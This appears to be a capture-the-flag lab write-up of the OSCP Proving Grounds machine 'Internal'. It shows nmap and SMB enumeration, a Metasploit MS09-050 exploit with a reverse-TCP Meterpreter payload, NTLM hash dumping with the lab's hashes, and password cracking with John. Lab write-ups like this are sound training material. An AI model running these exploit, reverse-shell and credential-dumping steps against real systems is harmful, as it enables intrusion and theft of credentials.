Internal – OSCP Proving Grounds

CTF OSCP Proving Grounds
ToxSec

Internal – OSCP Proving Grounds

Introduction

For this engagement, I tackled the OSCP Proving Grounds machine Internal. The goal was to gain a foothold, escalate privileges, and ultimately retrieve the flag from the administrator’s account. In this write-up, I’ll document my approach, mistakes, and lessons learned along the way.

Step 1: Initial Reconnaissance

Before attempting any exploits, I conducted a full port scan to identify available services.

Nmap Scan

I began with a basic Nmap scan to detect open ports and running services:

nmap -sC -sV --open

Findings:

  • SMB – 139, 445 (Microsoft Windows netbios-ssn, microsoft-ds)
  • RDP – 3389 (Microsoft Terminal Service)
  • DNS – 53 (Microsoft DNS Server)
  • HTTP API – 5357 (Microsoft HTTPAPI/2.0)
  • High-numbered ports (49152-49158, Microsoft Windows RPC)
  • Host identified as Windows Server 2008 SP1

This information immediately pointed me toward SMB, a common attack vector in pentesting Windows systems.

Step 2: SMB Enumeration

Since SMB was open, I attempted to list shares and check for any anonymous access.

Checking SMB Shares

smbclient -L //<target_IP> --no-pass
smbmap -H <target_IP>

Results:

  • No anonymous access to shares.
  • Nmap vulnerability scan on SMB:
nmap --script smb-vuln* -p 445 <target_IP>
  • Vulnerability Detected: MS09-050 (CVE-2009-3103) – SMBv2 Remote Code Execution

This vulnerability allowed remote code execution on Windows Vista/Server 2008 systems via SMBv2, making it a prime target for exploitation.

Step 3: Exploitation (MS09-050)

Armed with the vulnerability details, I loaded the corresponding Metasploit module:

use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
set RHOSTS <target_IP>
set LHOST <your_Kali_IP>
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 9999
run

Initial Failure & Debugging

  • First attempt failed. The exploit executed, but no shell was returned.
  • Realized my LHOST was incorrect (it defaulted to my local IP instead of my VPN tun0 IP).
  • Fixed by setting:
set LHOST <tun0 IP>
  • Reran the exploit β†’ Meterpreter session obtained! πŸŽ‰

Step 4: Post-Exploitation – Gaining SYSTEM Privileges

With an active Meterpreter session, I confirmed my access level:

getuid

βœ… User: NT AUTHORITY\SYSTEM (No privilege escalation needed!)

Enumerating Users & Files

  • List users:
net user

Check for active sessions:

query user

Look for flag:

search -f proof.txt

Found: C:\Users\Administrator\Desktop\proof.txt

Retrieving the Flag

cat C:\Users\Administrator\Desktop\proof.txt

πŸ† Flag captured!

Step 5: Credential Dumping & Password Cracking

Since I had SYSTEM privileges, I dumped the NTLM hashes:

hashdump

Extracted Hashes:

aaron:1002:505a9279cfd2f94c658980551cfde735
Administrator:500:848c583ff88fae9eb8c40e05e3bed204
jack:1003:e24106942bf38bcf57a6a4b29016eff6
niky:1000:e99eaad9ebc48c3bd0c9734d0c6d106b
tim:1001:4c67a94ab3de7684d00a941fae71f966

Cracking the Passwords with John:

john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

βœ… Recovered Passwords:

  • Aaron β†’ blue
  • Jack β†’ aaa
  • Niky β†’ niky

These passwords could potentially allow lateral movement to other machines in a real engagement.

Lessons Learned

  • Always check LHOST settings in Metasploit when using a VPN or NAT.
  • SMB is a critical attack vector on older Windows servers.
  • Windows user hashes can reveal weak credentials for lateral movement.
  • Automating enumeration steps (with smbclient, nmap, and hashdump) speeds up workflow.

Leave a Reply

Your email address will not be published. Required fields are marked *

Related Posts

Back To Top